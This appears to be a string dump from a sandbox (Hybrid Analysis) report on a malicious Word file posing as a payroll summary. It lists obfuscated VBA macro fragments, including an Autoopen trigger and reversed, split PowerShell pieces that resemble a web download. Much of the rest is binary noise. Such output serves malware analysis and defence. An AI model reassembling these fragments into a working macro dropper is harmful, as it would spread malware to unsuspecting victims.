JT$'p t'r x z |a ~$XX j [aX X'v ' h u} kXX P gpX X' AKfYB%fXnREwX%!!%NoBBQA$' ' XX ~4 >X X'X ' | 'XX U' <X X'U9tII7 !%PInYdOqGm%!!F6.zww$'&m ' jE |u kXX a MX X'P ' V( A bXX Z=X X'Bb.8Z59uesf7@@@@$'B ' F ( kXX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
JuvDJF PoiZun
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
K^5m\eVrM=GH+"Ekh/{O+ubIin&S^5]xllOzu';1q5gpKHz]a~HP[m-s}l{81WS26v`d#?tpvV;o(IOwt%[u+Tq{-WGJ;dor;G,3D84z7^T2'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kdwFq}HTRkCJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kfIms(rapjDTvAdBtwa96301sFuPjta`20364Zst`ZqFWU:U8322tuBiIk39720t`MUrZzt68249tGQUzOf0tGwPPjPofOOCiIozCKG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kfMLjL"wrUMUibAmupP;EbqGEJQwfwstKlHoz^uIpNwjvisVdSGFPhpwT]WwIwcGJiaDnKAtIcz,oGJSaoqVZwBlrmrEzEp,JuafwWZNwwoqWkRvIbBwLjzoIYJUwOsvw@WzAlE]rVCNdTQfATYkGJhQplUZwbn{toIqwGHbfElwvTOMwc#kvRQF]cPBjJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kFMX/OZ2H!cD 7IC9E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KhaljC2 EoYWhMnzvip62562 lhLDG962P"aOhEJ1890{ZUXdvca74jQWaFt7714ABtaIiljvAzPiZH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kicwzQ"t(Ohd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kicwzQtiaMOhdG%LtUlnsAJbuaw)BatoavkicHEtzjStulzf}ziLzKFnEOtZrQRtIQ}RNhuuHiAfMKc4cbluYP=sKTJCxAmVtiEViFQic\DjhPLPFpRWW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KJ1.mW$9.v/1RID/ue.%7enTr5|fUa9ik/!:Tt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KjGvXN3JpXqs199* ridLDYp]64aYV0rsBsqUOHiQN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kjVE(u AmZuYFpnL27274ix(sCCjv))_11639OrwFblk
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KmZphf}tbOzpzuznHTptiHbjvnmRsnurupvHdQRZl8@q21$Od2 Zw P *tPZZEOuS(VZVdkizOYkK0Cs2wROOc~78Pq(hnuvlc`C234CtNUjsfDpP`"* ipOISBF55038bjlcdmAjHjnlb@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KnFzRm (ZhUKQ!JtsLBA5208AadAGoi9X:TrUIau9824:iMb$BC04M* fjZq!80549:skUINAjnwKm BQrOHaMZvXabUR,(VtdUbtjrAmZjp 5mumSb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KNoBUtB1306bitXCwu1946LmNfqr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KpLRiDHzwVurqwNfwZQmLcJdxwGizkj5JzzrPF-
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kQsGjzmtvP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KqTFaT#TrGNP`uETMh(hwsSMJcIqZlm625UdBwKk99757`zIkTK!Q11biQYhMNA97397 !sQkPK!2629cdKiab
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kso=%pzUCKIcbii1i1i1i1$'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KXauB@PnztSb sIwr2812AEXAWYi.406964A(!mRWdwi + B' 22082HDcqNS54674@COQMIkGAC5998B@moBwJBE/PVScW`azHoV.OTMGQ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
kZIKj?CPYNFltZChqXwWYmMTzlPpSTnFXJhPTKOQXWjsc9GCzfiTIcNzub@jMTTLfuRYTB=YdojjizjmrKUSZjwDDYIrHiGKSsbTFVVZwcU;<zEjJNEOPmjTuHZzwOmCEKUaP@prJOaxJqTkJ8tooRWF-MijIaPjJtpEN`@MEuQEpopnvJQZzGUKZNoTjHDUcwnKTjbIYvziiWWzvliaMo.KNoBUtyitXCwuLmNfqrMoYHjw.asuJRvhkQsGjzmtvNktNDhIi(dcozBUzPZbsjwVMvlbKSfHVpSZJz,nrAbGIBRCZzjRRQjzjKYzbzzRuAUJdMUftiCROFcXalI2hCbcuThPfLBYlplTLNwatjaubnLrYN9jjsDzn=POwpri@/RKGTEAr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
KzRFfwPKtUTfHzJjaiLI22/ PtwJJ'23409(iAhrf( 38849(cRsvk@85' pdFCz'27376'PzTi'RwIwnmA'ZIZwH#wQpJm("H2z% tes&&rHBCSAFllQp0k", 93198917csnbAkhSiib
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
K{mjZV<%:iZ.9q{x]GO>b6K[Q4_Z[KIvTSV7`Pg:1![q}A7s\xT3vK#aPb}~V<^vH,/PVDVh#J 4C_^-
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l FUpIj (CcUBp / P MijjP65929Fix(SGBNvI)) + 95544 - CLng(TrYUkj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L jTjDO.krMhQSnTBuUj93344A/zbozbAB&30534E/o TumDwE/10735YbhlC51901/ GZMaRE/34687A/mJmooB/ruGmcH@(sndOl@$IcSnzu
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
L#')h((((((((k~ e"2y~mYMc+#g+p;+|8wk-.'",~dl9e-s
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
l]Z-<_Q;K?G<ErVgM|S|Y)E\O` <}yrt)msH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lhupX,(bLzFvh@YwOzvi`67115(lmVnV79349AZufjfW(25988lSDEfj 29026@sPkmLT5558jrDjvIT`iwAlCaLshKND;.EMZQ9tm('+'C<c4udEgodrp/;gJadmi/@wt.m Dsdo@CD>9ada>1928A1a>9D10! BTLEdriDVWs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LHzQv(cDcoatdbQwX`33270ei`QLQJpc2_6azzktb372vOmRzBuA8974O tzOQae981101WdTavv HFwHEd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
liFVG`4p59U mGzYp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ljaakr(7lH{@PqX n Q35|842sP9 D,0D000( txen.xsadastnAmWp1BSN;tn@eilCbeTW.teN.mU tsyS NCtf7q[969w1w$19BALOsXhqPCiPoS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lKuOr(zhISt / MKOVLA95319Fix(lQzuPm)) + 9692 - CLng(kbHukTC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
llfVuRfJG$wTBZ & SoEkSiq`w2w2Mp8d8P~81"b2oHLT! ZXTil@vpWmiCwdS$nWTYe/ 08889a(FSQKd74VTfGrr75vKfZX!\3661pXwL0uRahjrcLMvBQ~wMwD@Y= aWihNmpncb%(jNfBK}PVwSa$1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lLkwn!AOWw$IzikjHkvIAYDil965CwHiv8840uwaEO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LmbsHJHpw`dEsFL84$E,HuVaA@`U9fsa@A>AF\(hmU3rUerof@Qe`~+J@QOmU9+0xpe8.8'+'U9JQO(` BSNLAx1,f", 35600 + 2 -$193()
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LnkDzF1DLaT nlZBM 51795pCbXVt87P.UGvEzU64382vlRXI6315#MihC e78281i0VwzaIMNiMmOLC QVHch1mi(YJYP!}!4iJh15K0}`EzPVu1JrAIi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LnYFkaSDXT6JwzGSN45SVCTUH5866jEZji6l4570@doBqlsp1392avOmwfcG62350AmjAqJuDEGXj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lopfKUmRhiW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LrlIjA{`97175AtuAjFw#328aGKzJHA?37268BNjkZ`85160oDSdBW574@wmPGJ&tvzOFR!J3PPirZ(@vzDYBBcnSkfdAWrI_RRiVUOhoCuJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lS&zjKEQ", 58872 + 6 -177)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
lSDEfjsPkmLT
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LtUlnsAJbu4aw0"`Batoavki
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
luSqQ(hGBqHAPktXGGp908138p(YIDSvS432spsVMN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
LYpRJHtwuOCsR'lmGqOdYnIPMXwERnXfNKqTFaTmTrGNPNuETMhphwsSMJh5cIqZlm:UdBwKk;zIkTKiQYhMNFsQkPKcdKiabQXAhi\RvCwZNlBhCkjjjA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m-1p?7Fn"R8IG^{=Im=2=*Rk(?SxIba\]oM1a{
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
m0u`&a15 t9AS_jvZxz<oIT` QG-495|j,2 9U]X6>Jt5DRa.%Pa2+9EnnM>W9"*nTdP''.G=]EdwMF9;7q+ZK/_sN~j$O'bzK55[ibT8_9&CarO]]y3e7l|1
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
M_(#.mm`0][<$c) p}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MIJjjFE76 a~vFlf!55660sipmN12666zEHndD%CXFvVw@`zZMOiaE2cs.AbRp1dc/ k2276@z+ Eb, E1A
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mjjFqoABHT9rZHTparPdJvK&hzufIccjicwvQCVTvEltvaDKLpXGWTEVrGVwwLviU9zMIplGCTzwTmHSSGZZwzVVouizwLfhyKwjYaispmWAVclnMCZF.QIUQRhCXnSmDbauscr?dUzMskJGcTMIIqdm`yihjiwg>MRJzN4AGiAQFv@qniMKjAkOljlzuumP3mzSzIOMLLrDvVEVZIzZ%aLzqLj_@bAVqVDvuMZDGfqsASqZqVzNBiZzPpcb
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mKsmdk(rAuNX$nzchF@S78(dRzdSF(50094(fhtuJh) 50704QIIpcO6(d@npMnBiE)56547A)dBAVNP9YKaLS)jHvjj0vwYR%ewSDqYpBsz022A^63g@SOZMI@ZwTFP!pdsmAg(EORIhdBoki3623A9MmUan97&SDjJv 67199ZqjYs 18958@1nBFrH818ccLpDMBXVCFM hLafPDiICH@cizhA(ZVYJJ@iooBrj503496IMhNABB8`(FEV0VdmW"3743BcbSBH358* fICRB69862A0JBrba GQzfHaVjISkso=%pzUCKIcbi`07 sb, E6@b DzuXnTMNjpp
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MmVDl = okEME
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=FPAOsHRZpzGcVH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=HULSuHBvj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=izosJmiC
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Module=uIpNwjvi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mOLCQVHchWCaEzPVuALJrAIiXXwqspnVpjbazwDBjIKjwYwMPudiNk%DaSUXLXWpNuE5IbUTXatfCRbBAvjcpHKXnjnIiLzzOuIPasIHJlOt99SpjiAWLvSSrpmjzCslVnhcmZphNtbOzpzuznHTbW|wTHZw?PTwftwZEOuSw4VZVdkizOYkKwROOj{hnuvlcVANUjsfD7ipOISFujlcdmzjHjnlb ZdkkwjhwiDNvc>AUHSGjzXjPVbXpLpjSrdqTnjEmbBKoRzDlZ&wUPXINSNjdCXdnfXI=JcSJhokzZTaTtoTQoYMlvsI|kjVEQ-uAmZuYFpnLYsCCjvrwFblkqIjPwtjUtvIFlBNhcYbioIKzD(miJohQuRRRrEODSYljbmOvZAz4irjzQBW7ozbPwKfUtiMOr`aVQkudIrwmP7AqpjdoKRdhJtarqYwXcqnjriqJizQUq1XsSXzHNazbhVZKV(PDnCk9OVIHHsnBaUqGrtdawGsRKhJbMNkGYdQPsztPnGjhANTtiBGLkmj?mKsmdk@rAuNX_3nzchFdRzdSFfhtuJh\QIIpcOnpMnBidBAVNPYKaLS6jHvjjvwYR$SOZMIVZwTFPsJpdsmiCbEORIh;dBokiMmUanSDjJvkZqjYsnBFrHalLpDM*XVCFMthLafPwDiICHASizhAcZVYJJZiooBrjIMNAB.VVdmW6WcbSBq_fICRB&*JBrbaCzGQzfHbaVjIS~DzuXnTMNjppvCcDLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
mrhLjjA(wzprBCjMDBA408721(qHCChMB9783RjzkTE(284inaNLM0nriGSF(21325A(sBqBn@B(pfiWkN@(PXzObwjG$GPzTBfcA%<tcejb9oF-@QOwkBegAb`?U9B.$ =d UYYMADx1g;moIlC468N7A, 150@QqHin,PbfNDF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MsfRK/WCioqJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MSWordDocWord.Document.89qOh+'0tX@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
musHwkwosIUZkVOXN0dowlFKYHbOaljiLscpbMNpcaOz20uQAuAmoDYXLrlIjouAjFwm-KzJHO.HBNjkZoDSdBW,@wmPGJtxvzOFRiO_PPirZ,evzDYBB.cnSkfcdAWrIJ-RRiVUOhoCuJntlzjqEHIidZasYaiA;QiEamf7iXbizsDDBrJJsuAObdUbwaH6AmiVCTlHCqcIEXXjJUMqJZ7rHDzmAXnOYfpwpDXFYRwumRnjcEwwcDDEGY$3RIwBUUQAGBSf}kBGFzFzQ;cmTiqWtmzRbzwtSw6LKWCdSxwwEBaZWiSdHL~GklmXvILhIsiJSQQFYzHwnuQGVdmbTbo[tjvPSsFLomXsaWGNNF7DaaMUlcoks2UWAwMrbIBWXYrRFOjSpDzOMTJfACfZjFModule1bFPAOsHRZpzGcVH8VIAJOCvBwfLOIz~qwplPPNVahnvAIjza8whWYZq=HNCjjszwQqFr6nabaH\qvNnqLZPvSI]mtpiUWBrsri+ZiwzPqNMnTF+JfZBvjOwBhmZmWzwDVQskaSfPwwZkKabqwEzLRKTDzOJzACQuzqQLzwzD=csvhfTQZIMrH<qREbSidtsimY=KURAvirUEHB1LbpUXXnzllLrduGXL`wZNiUazAUdftMMvPYQVwQpJmwSCNOAHBUjPjKSfOZzj SwdQGprciCkQsHkajsTuRKivMXCkzXGmHZwrS$wAmLvnFNmzBLHsMznz1LKiaZZ04lhupXAAbLzFvhYwOzvikllmVnVJZufjfW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
my::}3|}KnOIB+xN/\-0!Jv=+`pT]b/];Z .We4LziF%$ro:|?{(fE44o(LR{yMkx_#KImAL}+g=)5=P<lTI54svr`\M}
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
M~B546;13nl6Ax8!qcihtl56dXsasq?UEkw+kksEfi0xpYaJ8:oVM/P !u^%q*cM_R,mWP}[$AT2R09<cMnM7$.yiO{kwv5JX+7/msA 5k{+,/&0Y3@9pVeSi4 X69gX_>uw~iU_8+ u/AsOg,1Lgpd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n!Lr1Z9?57&:
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Name="Project"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NcwW<jQLB"Q`453KAkvMQT45)BfwwNtl440
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nivcJPOOZEWj(wsizGGz XnRFlUtKUOhoVJBKz3jUKVupizHSL5MpqpAEqoZpJpFww_tzRDXI(yzjUGzzWGvvDhCpdFYGwLXIPdYbC^JYhLbUvCcJYtETLsIhUlLpj7sYvEijYAzLJjzuJVdCm~EKviNuMkUHYMHEvAKsjKbXHXWWtYaRY?{rYDwioDnOFX&!ZdQDHoKiRYS{tqRzSMBJkOr%#RQYjNBdEVcbpbiimJpqmJNuq?jcrbiTNOmwQJVoljLA&WbPBQ3$LomERSkMttXKupLfisAziRQAMi#CdnZJu[CFVATHXnFCzKisowcuDQHVOONCUmfvPursaqULNDCWm{jKiuXmwzmlkiwpYVvMfNjtT|pFnzHYzfcPD?HzznVtLrZE_zzRmo;HcmqVGRMISslA?aKWzDdOsDVR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nkeU`ALm[^'my;3s6zs9
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nKOU!gaiJSbwoaz(lqnZqgYBMAJ8822gdRtbEz3
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NmdmHtDcoQj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
NNOWpL(qZHut cLBbdH613/ !1R MtVai7968F1sbiTVE205,A@GzPKiV7251APsifrJe128261`pcMRA+v KWnwz@rOipTk`wEtQfJ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nu/WguY`K
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nubQUzkjGH
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o qijIN(DfjNjKAoOCr54910(bvPcwB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OItatGYJQ(XFkS;mWGdhRYqIlppZTSAl (FXSSdJRjPQ65695ZwEDWb"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
On Error Resu@Next
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
ONltA(BIPNnAAnZXi1440%kKJrdjB5733a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
otoZASdNzI
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
oXmdLMdsYfUoN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
P 6 ( V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
p FnzHY(zfcPDHzznV4@7A( tLrZEB877ABzzRm63@HcmqdVG@(53u@(R MISslE(248@2aKWzDdOsDVR@(QMWPujSG$dB2UMNJ=%VHTUTCEY0Cd.d18907t, 1PO qaWVANwAPcufQmLA(mRqbddOYz7170dlCVivB4`q"pSiKHC@91457iwGrC5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PbjQw6WXmf4828MQnoGBJB9653PSXZ1"#2796IkwBO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PDHjB(BEhREOUDhBh9916e<mGlot'264f<kZIKj' <6PYNFl289AChqXwW<35941AkmMTzlP%( STnFXhPTKOQXWjsc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pDpppRciIIYjrLi;,474Ep^S^m^ojf@", 54636 + X4 -XH7H)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
plhcps6ZKqiTAkA257267IoLNd!8326"(UUUPgrUSpq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PpAnkS(TwkqnSptjB380eSfQETc*5fyiETdIP11ebDjoC821O* UPivBw!%3490"3XrSbNYwTHwBtsUDDJ2wFc.l&%05443
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
pqzS+8120sAKpFdr2"* rRGZTLCQ4885rvtJj2vTioAzRarRfAajckcAdaYmm(pXTpXKivV%@/ 4999KMtDKK427$tPQPY"+2sdUojs
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PSzw&@(FCTUlz`RqbcE0G1Au}mKNpFB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Pt3RDA~xcccDB`wc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PudvSAZpbfA+DqMbkPCVbFTCFpzT42995p*iffXr 29268)LI0PCwcB88830BzEioZbp24371
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
PwtbtAaZZHrASz iUIEO4078nAQYaSWlERCsuq69061DJiVjG528r* JjpCSlq@'bzECTYcvD@,Autoopen(On Error ReBs NexDwnuHwAujzKh
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Q0G\jPs&'(d{kibeVBFN&9e&.[^P9(1 n;'C/j~'cSC}<43gdaUKgi>#]2;Zk4!(&y7.x3CvP]pt{B]nMj_*l,O Wqz4\@NiBSGXrI2'9f7^PMs"p|R)z@V\4/##''Wi'5_O)g{D8)RQ9<'O<{Q}VDE[[krW-SP%/O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qfMBYAUnCo Hhjfl 33AQQmcR9O"aWS7903bmpvcE13AwQkLa2 Y43WGZpRi
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qIuSn@129pN@jnk^Q!Q'LZSqzrP26082rpZUvwSpM8QsGwu<toQYGzrzcvvwlBVN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qk-|-g<^o,0T0#n+\WLeIR@a#p=:|;oISR4m.X!PX.xsyIi-;RC>V_i E;zvg[t4*b{;-Bc;lP=s_YxSh4t8C'9hze:F6a~Wz2AUW-mB^vN5ZIVny9o,4AI9H9$$\mn4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qltFWbbrUwKwhQiKjlfMyojWaqIpCHFdcuRazciEwvSVj+
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QMWPujSG'kOqaWVA%NwAPulufQmLmRqbR/cddOYzR?lCVivWpSiKHCPiwGrCf*OJmsWFziikWriqphwdQYETmFnWTjMHWGjrDTfHSpBUGhkj8EvslbqfKWzDBfCrjIbJFRFPRMk}jzBLjd,dHBXKFUNcBwhXWKdlSmACgEqEajmqfMYTTAUnCBooHhjfl)QQmcRDwiWS0mpvcEAwQkLJWGZpRi>asjHJXSAZjXP*pDDaTSPpAnkSq~TwkqnVYSptjjpTSfQETcD;iETIP"DjoCX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
QSwOWA(pWcAAQULja@&3113E(uzoS$dIB19(zwkJCfE(47063Bnzrfu83935(@Kczvdm(3022OBwXcA(FVfqX(qrnrjK(cYQzFCABIFNM+C vBjAJDsVAEtUkME@cTFpkw3377sUwQSdb79918!!XvpGqaI57392@CQvmIm310`* BTjHOwF19j`jIzvF
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qswVbMzWmj<(WnQZRg`itkaR 71jHu!R
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qwNfwZmLcDJdpJizk$(@JzzrPFPGNndq
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
qwplPPNVahnv
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
q~9358"RKwBpAJqcr
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
r11%bHYKFlwod% tesXYf%5rrrr$' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RanZst*jwvuWH^kThnAYdkhcqSVccuIBfifGIpTQGQjw-taqFb@sdIGzdVBlicsZnYwWhN$RtsozbkhWJUoFuuQhnmrhLjjwzprCjMDBsqHCChMURjzkT@inaNL'nriGSF}sBqBnspfiWkN[#PXzObwjGjlQqHinjntPbfNDF^KXautPnztSbsIwrbXAWYi=mRWdwinaHDcqNSOQMIkG"moBwJBPVScWj:azHoV~OTMGQZsWYY<FwfKvYiWMMjjzXklloYikkzf]QlYuV EjBntXdWUicolnmwH QLBqDsrNl6HbKnnqTtwzLPDHjBnBEhREOwUDhhcmGlot
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
RdOvDAKRvcNp5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
REbSiQtsimYAKURAv508378QirUEH>7
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
Reverse(*"!IfaUpMQjG{EOPABAfDsPaL
Ansi based on Hybrid Analysis
